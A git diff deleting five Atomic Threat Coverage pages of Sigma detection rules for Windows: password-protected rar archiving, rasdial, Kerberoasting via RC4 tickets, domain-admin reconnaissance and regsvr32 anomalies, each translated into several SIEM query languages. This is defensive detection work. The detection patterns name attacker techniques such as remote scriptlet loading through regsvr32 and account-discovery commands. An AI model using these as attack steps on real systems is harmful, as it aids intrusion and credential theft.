diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_susp_rar_flags.md b/Atomic_Threat_Coverage/Detection_Rules/win_susp_rar_flags.md
deleted file mode 100644
index d8b7517..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_susp_rar_flags.md
+++ /dev/null
@@ -1,174 +0,0 @@
-| Title                    | Rar with Password or Compression Level       |
-|:-------------------------|:------------------|
-| **Description**          | Detects the use of rar.exe, on the command line, to create an archive with password protection or with a specific compression level. This is pretty indicative of malicious actions. |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0010: Exfiltration](https://attack.mitre.org/tactics/TA0010)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1002: Data Compressed](https://attack.mitre.org/techniques/T1002)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | medium |
-| **False Positives**      | <ul><li>Legitimate use of Winrar command line version</li><li>Other command line tools, that use these flags</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://labs.sentinelone.com/the-anatomy-of-an-apt-attack-and-cobaltstrike-beacons-encoded-configuration/](https://labs.sentinelone.com/the-anatomy-of-an-apt-attack-and-cobaltstrike-beacons-encoded-configuration/)</li></ul>  |
-| **Author**               | @ROxPinTeddy |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Rar with Password or Compression Level 
-id: faa48cae-6b25-4f00-a094-08947fef582f
-status: experimental
-description: Detects the use of rar.exe, on the command line, to create an archive with password protection or with a specific compression level. This is pretty indicative of malicious actions. 
-references:
-    - https://labs.sentinelone.com/the-anatomy-of-an-apt-attack-and-cobaltstrike-beacons-encoded-configuration/
-author: '@ROxPinTeddy'
-date: 2020/05/12
-tags:
-    - attack.exfiltration
-    - attack.t1002
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-       CommandLine|contains|all:
-               - ' -hp'
-               - ' -m'
-    condition: selection
-falsepositives:
-    - Legitimate use of Winrar command line version
-    - Other command line tools, that use these flags
-level: medium
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and $_.message -match "CommandLine.*.* -hp.*" -and $_.message -match "CommandLine.*.* -m.*") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_data.CommandLine.keyword:*\ \-hp* AND winlog.event_data.CommandLine.keyword:*\ \-m*)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/faa48cae-6b25-4f00-a094-08947fef582f <<EOF
-{
-  "metadata": {
-    "title": "Rar with Password or Compression Level",
-    "description": "Detects the use of rar.exe, on the command line, to create an archive with password protection or with a specific compression level. This is pretty indicative of malicious actions.",
-    "tags": [
-      "attack.exfiltration",
-      "attack.t1002"
-    ],
-    "query": "(winlog.event_data.CommandLine.keyword:*\\ \\-hp* AND winlog.event_data.CommandLine.keyword:*\\ \\-m*)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_data.CommandLine.keyword:*\\ \\-hp* AND winlog.event_data.CommandLine.keyword:*\\ \\-m*)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Rar with Password or Compression Level'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(CommandLine.keyword:* \-hp* AND CommandLine.keyword:* \-m*)
-```
-
-
-### splunk
-    
-```
-(CommandLine="* -hp*" CommandLine="* -m*")
-```
-
-
-### logpoint
-    
-```
-(event_id="1" CommandLine="* -hp*" CommandLine="* -m*")
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*.* -hp.*)(?=.*.* -m.*))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_susp_rasdial_activity.md b/Atomic_Threat_Coverage/Detection_Rules/win_susp_rasdial_activity.md
deleted file mode 100644
index 5331b0d..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_susp_rasdial_activity.md
+++ /dev/null
@@ -1,177 +0,0 @@
-| Title                    | Suspicious RASdial Activity       |
-|:-------------------------|:------------------|
-| **Description**          | Detects suspicious process related to rasdial.exe |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005)</li><li>[TA0002: Execution](https://attack.mitre.org/tactics/TA0002)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1064: Scripting](https://attack.mitre.org/techniques/T1064)</li><li>[T1059: Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | medium |
-| **False Positives**      | <ul><li>False positives depend on scripts and administrative tools used in the monitored environment</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://twitter.com/subTee/status/891298217907830785](https://twitter.com/subTee/status/891298217907830785)</li></ul>  |
-| **Author**               | juju4 |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Suspicious RASdial Activity
-id: 6bba49bf-7f8c-47d6-a1bb-6b4dece4640e
-description: Detects suspicious process related to rasdial.exe
-status: experimental
-references:
-    - https://twitter.com/subTee/status/891298217907830785
-author: juju4
-date: 2019/01/16
-tags:
-    - attack.defense_evasion
-    - attack.execution
-    - attack.t1064
-    - attack.t1059
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        CommandLine:
-            - rasdial
-    condition: selection
-falsepositives:
-    - False positives depend on scripts and administrative tools used in the monitored environment
-level: medium
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and ($_.message -match "rasdial")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-winlog.event_data.CommandLine:("rasdial")
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/6bba49bf-7f8c-47d6-a1bb-6b4dece4640e <<EOF
-{
-  "metadata": {
-    "title": "Suspicious RASdial Activity",
-    "description": "Detects suspicious process related to rasdial.exe",
-    "tags": [
-      "attack.defense_evasion",
-      "attack.execution",
-      "attack.t1064",
-      "attack.t1059"
-    ],
-    "query": "winlog.event_data.CommandLine:(\"rasdial\")"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "winlog.event_data.CommandLine:(\"rasdial\")",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Suspicious RASdial Activity'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-CommandLine:("rasdial")
-```
-
-
-### splunk
-    
-```
-(CommandLine="rasdial")
-```
-
-
-### logpoint
-    
-```
-(event_id="1" CommandLine IN ["rasdial"])
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*rasdial)'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_susp_rc4_kerberos.md b/Atomic_Threat_Coverage/Detection_Rules/win_susp_rc4_kerberos.md
deleted file mode 100644
index 8d8df1c..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_susp_rc4_kerberos.md
+++ /dev/null
@@ -1,180 +0,0 @@
-| Title                    | Suspicious Kerberos RC4 Ticket Encryption       |
-|:-------------------------|:------------------|
-| **Description**          | Detects service ticket requests using RC4 encryption type |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0006: Credential Access](https://attack.mitre.org/tactics/TA0006)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1208: Kerberoasting](https://attack.mitre.org/techniques/T1208)</li></ul>  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | medium |
-| **False Positives**      | <ul><li>Service accounts used on legacy systems (e.g. NetApp)</li><li>Windows Domains with DFL 2003 and legacy systems</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://adsecurity.org/?p=3458](https://adsecurity.org/?p=3458)</li><li>[https://www.trimarcsecurity.com/single-post/TrimarcResearch/Detecting-Kerberoasting-Activity](https://www.trimarcsecurity.com/single-post/TrimarcResearch/Detecting-Kerberoasting-Activity)</li></ul>  |
-| **Author**               | Florian Roth |
-| Other Tags           | <ul><li>attack.t1558.003</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Suspicious Kerberos RC4 Ticket Encryption
-id: 496a0e47-0a33-4dca-b009-9e6ca3591f39
-status: experimental
-references:
-    - https://adsecurity.org/?p=3458
-    - https://www.trimarcsecurity.com/single-post/TrimarcResearch/Detecting-Kerberoasting-Activity
-tags:
-    - attack.credential_access
-    - attack.t1208
-    - attack.t1558.003
-description: Detects service ticket requests using RC4 encryption type
-author: Florian Roth
-date: 2017/02/06
-logsource:
-    product: windows
-    service: security
-detection:
-    selection:
-        EventID: 4769
-        TicketOptions: '0x40810000'
-        TicketEncryptionType: '0x17'
-    reduction:
-        - ServiceName: '$*'
-    condition: selection and not reduction
-falsepositives:
-    - Service accounts used on legacy systems (e.g. NetApp)
-    - Windows Domains with DFL 2003 and legacy systems
-level: medium
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Security | where {(($_.ID -eq "4769" -and $_.message -match "TicketOptions.*0x40810000" -and $_.message -match "TicketEncryptionType.*0x17") -and  -not ($_.message -match "ServiceName.*$.*")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.channel:"Security" AND (winlog.event_id:"4769" AND winlog.event_data.TicketOptions:"0x40810000" AND winlog.event_data.TicketEncryptionType:"0x17") AND (NOT (winlog.event_data.ServiceName.keyword:$*)))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/496a0e47-0a33-4dca-b009-9e6ca3591f39 <<EOF
-{
-  "metadata": {
-    "title": "Suspicious Kerberos RC4 Ticket Encryption",
-    "description": "Detects service ticket requests using RC4 encryption type",
-    "tags": [
-      "attack.credential_access",
-      "attack.t1208",
-      "attack.t1558.003"
-    ],
-    "query": "(winlog.channel:\"Security\" AND (winlog.event_id:\"4769\" AND winlog.event_data.TicketOptions:\"0x40810000\" AND winlog.event_data.TicketEncryptionType:\"0x17\") AND (NOT (winlog.event_data.ServiceName.keyword:$*)))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.channel:\"Security\" AND (winlog.event_id:\"4769\" AND winlog.event_data.TicketOptions:\"0x40810000\" AND winlog.event_data.TicketEncryptionType:\"0x17\") AND (NOT (winlog.event_data.ServiceName.keyword:$*)))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Suspicious Kerberos RC4 Ticket Encryption'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-((EventID:"4769" AND TicketOptions:"0x40810000" AND TicketEncryptionType:"0x17") AND (NOT (ServiceName.keyword:$*)))
-```
-
-
-### splunk
-    
-```
-(source="WinEventLog:Security" (EventCode="4769" TicketOptions="0x40810000" TicketEncryptionType="0x17") NOT (ServiceName="$*"))
-```
-
-
-### logpoint
-    
-```
-(event_source="Microsoft-Windows-Security-Auditing" (event_id="4769" ticket_options="0x40810000" TicketEncryptionType="0x17")  -(service="$*"))
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*(?:.*(?=.*4769)(?=.*0x40810000)(?=.*0x17)))(?=.*(?!.*(?:.*(?:.*(?=.*\$.*))))))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_susp_recon_activity.md b/Atomic_Threat_Coverage/Detection_Rules/win_susp_recon_activity.md
deleted file mode 100644
index 54e096e..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_susp_recon_activity.md
+++ /dev/null
@@ -1,179 +0,0 @@
-| Title                    | Suspicious Reconnaissance Activity       |
-|:-------------------------|:------------------|
-| **Description**          | Detects suspicious command line activity on Windows systems |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0007: Discovery](https://attack.mitre.org/tactics/TA0007)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1087: Account Discovery](https://attack.mitre.org/techniques/T1087)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | medium |
-| **False Positives**      | <ul><li>Inventory tool runs</li><li>Penetration tests</li><li>Administrative activity</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           |  There are no documented References for this Detection Rule yet  |
-| **Author**               | Florian Roth |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Suspicious Reconnaissance Activity
-id: d95de845-b83c-4a9a-8a6a-4fc802ebf6c0
-status: experimental
-description: Detects suspicious command line activity on Windows systems
-author: Florian Roth
-date: 2019/01/16
-tags:
-    - attack.discovery
-    - attack.t1087
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        CommandLine:
-            - net group "domain admins" /domain
-            - net localgroup administrators
-    condition: selection
-fields:
-    - CommandLine
-    - ParentCommandLine
-falsepositives:
-    - Inventory tool runs
-    - Penetration tests
-    - Administrative activity
-analysis:
-    recommendation: Check if the user that executed the commands is suspicious (e.g. service accounts, LOCAL_SYSTEM)
-level: medium
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and ($_.message -match "net group \"domain admins\" /domain" -or $_.message -match "net localgroup administrators")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-winlog.event_data.CommandLine:("net\ group\ \"domain\ admins\"\ \/domain" OR "net\ localgroup\ administrators")
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/d95de845-b83c-4a9a-8a6a-4fc802ebf6c0 <<EOF
-{
-  "metadata": {
-    "title": "Suspicious Reconnaissance Activity",
-    "description": "Detects suspicious command line activity on Windows systems",
-    "tags": [
-      "attack.discovery",
-      "attack.t1087"
-    ],
-    "query": "winlog.event_data.CommandLine:(\"net\\ group\\ \\\"domain\\ admins\\\"\\ \\/domain\" OR \"net\\ localgroup\\ administrators\")"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "winlog.event_data.CommandLine:(\"net\\ group\\ \\\"domain\\ admins\\\"\\ \\/domain\" OR \"net\\ localgroup\\ administrators\")",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Suspicious Reconnaissance Activity'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\n      CommandLine = {{_source.CommandLine}}\nParentCommandLine = {{_source.ParentCommandLine}}================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-CommandLine:("net group \"domain admins\" \/domain" "net localgroup administrators")
-```
-
-
-### splunk
-    
-```
-(CommandLine="net group \"domain admins\" /domain" OR CommandLine="net localgroup administrators") | table CommandLine,ParentCommandLine
-```
-
-
-### logpoint
-    
-```
-(event_id="1" CommandLine IN ["net group \"domain admins\" /domain", "net localgroup administrators"])
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*net group "domain admins" /domain|.*net localgroup administrators)'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_susp_regsvr32_anomalies.md b/Atomic_Threat_Coverage/Detection_Rules/win_susp_regsvr32_anomalies.md
deleted file mode 100644
index af6049e..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_susp_regsvr32_anomalies.md
+++ /dev/null
@@ -1,201 +0,0 @@
-| Title                    | Regsvr32 Anomaly       |
-|:-------------------------|:------------------|
-| **Description**          | Detects various anomalies in relation to regsvr32.exe |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005)</li><li>[TA0002: Execution](https://attack.mitre.org/tactics/TA0002)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1117: Regsvr32](https://attack.mitre.org/techniques/T1117)</li><li>[T1218: Signed Binary Proxy Execution](https://attack.mitre.org/techniques/T1218)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              | <ul><li>[T1218: Signed Binary Proxy Execution](../Triggers/T1218.md)</li></ul>  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>Unknown</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://subt0x10.blogspot.de/2017/04/bypass-application-whitelisting-script.html](https://subt0x10.blogspot.de/2017/04/bypass-application-whitelisting-script.html)</li></ul>  |
-| **Author**               | Florian Roth |
-| Other Tags           | <ul><li>car.2019-04-002</li><li>car.2019-04-003</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Regsvr32 Anomaly
-id: 8e2b24c9-4add-46a0-b4bb-0057b4e6187d
-status: experimental
-description: Detects various anomalies in relation to regsvr32.exe
-author: Florian Roth
-date: 2019/01/16
-references:
-    - https://subt0x10.blogspot.de/2017/04/bypass-application-whitelisting-script.html
-tags:
-    - attack.t1117
-    - attack.defense_evasion
-    - attack.execution
-    - car.2019-04-002
-    - car.2019-04-003
-    - attack.t1218
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection1:
-        Image: '*\regsvr32.exe'
-        CommandLine: '*\Temp\\*'
-    selection2:
-        Image: '*\regsvr32.exe'
-        ParentImage: '*\powershell.exe'
-    selection3:
-        Image: '*\regsvr32.exe'
-        ParentImage: '*\cmd.exe'
-    selection4:
-        Image: '*\regsvr32.exe'
-        CommandLine:
-            - '*/i:http* scrobj.dll'
-            - '*/i:ftp* scrobj.dll'
-    selection5:
-        Image: '*\wscript.exe'
-        ParentImage: '*\regsvr32.exe'
-    selection6:
-        Image: '*\EXCEL.EXE'
-        CommandLine: '*..\..\..\Windows\System32\regsvr32.exe *'
-    condition: 1 of them
-fields:
-    - CommandLine
-    - ParentCommandLine
-falsepositives:
-    - Unknown
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {(($_.ID -eq "1") -and (($_.message -match "Image.*.*\\regsvr32.exe" -and $_.message -match "CommandLine.*.*\\Temp\\.*") -or ($_.message -match "Image.*.*\\regsvr32.exe" -and $_.message -match "ParentImage.*.*\\powershell.exe") -or ($_.message -match "Image.*.*\\regsvr32.exe" -and $_.message -match "ParentImage.*.*\\cmd.exe") -or ($_.message -match "Image.*.*\\regsvr32.exe" -and ($_.message -match "CommandLine.*.*/i:http.* scrobj.dll" -or $_.message -match "CommandLine.*.*/i:ftp.* scrobj.dll")) -or ($_.message -match "Image.*.*\\wscript.exe" -and $_.message -match "ParentImage.*.*\\regsvr32.exe") -or ($_.message -match "Image.*.*\\EXCEL.EXE" -and $_.message -match "CommandLine.*.*..\\..\\..\\Windows\\System32\\regsvr32.exe .*"))) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-((winlog.event_data.Image.keyword:*\\regsvr32.exe AND winlog.event_data.CommandLine.keyword:*\\Temp\\*) OR (winlog.event_data.Image.keyword:*\\regsvr32.exe AND winlog.event_data.ParentImage.keyword:*\\powershell.exe) OR (winlog.event_data.Image.keyword:*\\regsvr32.exe AND winlog.event_data.ParentImage.keyword:*\\cmd.exe) OR (winlog.event_data.Image.keyword:*\\regsvr32.exe AND winlog.event_data.CommandLine.keyword:(*\/i\:http*\ scrobj.dll OR *\/i\:ftp*\ scrobj.dll)) OR (winlog.event_data.Image.keyword:*\\wscript.exe AND winlog.event_data.ParentImage.keyword:*\\regsvr32.exe) OR (winlog.event_data.Image.keyword:*\\EXCEL.EXE AND winlog.event_data.CommandLine.keyword:*..\\..\\..\\Windows\\System32\\regsvr32.exe\ *))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/8e2b24c9-4add-46a0-b4bb-0057b4e6187d <<EOF
-{
-  "metadata": {
-    "title": "Regsvr32 Anomaly",
-    "description": "Detects various anomalies in relation to regsvr32.exe",
-    "tags": [
-      "attack.t1117",
-      "attack.defense_evasion",
-      "attack.execution",
-      "car.2019-04-002",
-      "car.2019-04-003",
-      "attack.t1218"
-    ],
-    "query": "((winlog.event_data.Image.keyword:*\\\\regsvr32.exe AND winlog.event_data.CommandLine.keyword:*\\\\Temp\\\\*) OR (winlog.event_data.Image.keyword:*\\\\regsvr32.exe AND winlog.event_data.ParentImage.keyword:*\\\\powershell.exe) OR (winlog.event_data.Image.keyword:*\\\\regsvr32.exe AND winlog.event_data.ParentImage.keyword:*\\\\cmd.exe) OR (winlog.event_data.Image.keyword:*\\\\regsvr32.exe AND winlog.event_data.CommandLine.keyword:(*\\/i\\:http*\\ scrobj.dll OR *\\/i\\:ftp*\\ scrobj.dll)) OR (winlog.event_data.Image.keyword:*\\\\wscript.exe AND winlog.event_data.ParentImage.keyword:*\\\\regsvr32.exe) OR (winlog.event_data.Image.keyword:*\\\\EXCEL.EXE AND winlog.event_data.CommandLine.keyword:*..\\\\..\\\\..\\\\Windows\\\\System32\\\\regsvr32.exe\\ *))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "((winlog.event_data.Image.keyword:*\\\\regsvr32.exe AND winlog.event_data.CommandLine.keyword:*\\\\Temp\\\\*) OR (winlog.event_data.Image.keyword:*\\\\regsvr32.exe AND winlog.event_data.ParentImage.keyword:*\\\\powershell.exe) OR (winlog.event_data.Image.keyword:*\\\\regsvr32.exe AND winlog.event_data.ParentImage.keyword:*\\\\cmd.exe) OR (winlog.event_data.Image.keyword:*\\\\regsvr32.exe AND winlog.event_data.CommandLine.keyword:(*\\/i\\:http*\\ scrobj.dll OR *\\/i\\:ftp*\\ scrobj.dll)) OR (winlog.event_data.Image.keyword:*\\\\wscript.exe AND winlog.event_data.ParentImage.keyword:*\\\\regsvr32.exe) OR (winlog.event_data.Image.keyword:*\\\\EXCEL.EXE AND winlog.event_data.CommandLine.keyword:*..\\\\..\\\\..\\\\Windows\\\\System32\\\\regsvr32.exe\\ *))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Regsvr32 Anomaly'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\n      CommandLine = {{_source.CommandLine}}\nParentCommandLine = {{_source.ParentCommandLine}}================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-((Image.keyword:*\\regsvr32.exe AND CommandLine.keyword:*\\Temp\\*) OR (Image.keyword:*\\regsvr32.exe AND ParentImage.keyword:*\\powershell.exe) OR (Image.keyword:*\\regsvr32.exe AND ParentImage.keyword:*\\cmd.exe) OR (Image.keyword:*\\regsvr32.exe AND CommandLine.keyword:(*\/i\:http* scrobj.dll *\/i\:ftp* scrobj.dll)) OR (Image.keyword:*\\wscript.exe AND ParentImage.keyword:*\\regsvr32.exe) OR (Image.keyword:*\\EXCEL.EXE AND CommandLine.keyword:*..\\..\\..\\Windows\\System32\\regsvr32.exe *))
-```
-
-
-### splunk
-    
-```
-((Image="*\\regsvr32.exe" CommandLine="*\\Temp\\*") OR (Image="*\\regsvr32.exe" ParentImage="*\\powershell.exe") OR (Image="*\\regsvr32.exe" ParentImage="*\\cmd.exe") OR (Image="*\\regsvr32.exe" (CommandLine="*/i:http* scrobj.dll" OR CommandLine="*/i:ftp* scrobj.dll")) OR (Image="*\\wscript.exe" ParentImage="*\\regsvr32.exe") OR (Image="*\\EXCEL.EXE" CommandLine="*..\\..\\..\\Windows\\System32\\regsvr32.exe *")) | table CommandLine,ParentCommandLine
-```
-
-
-### logpoint
-    
-```
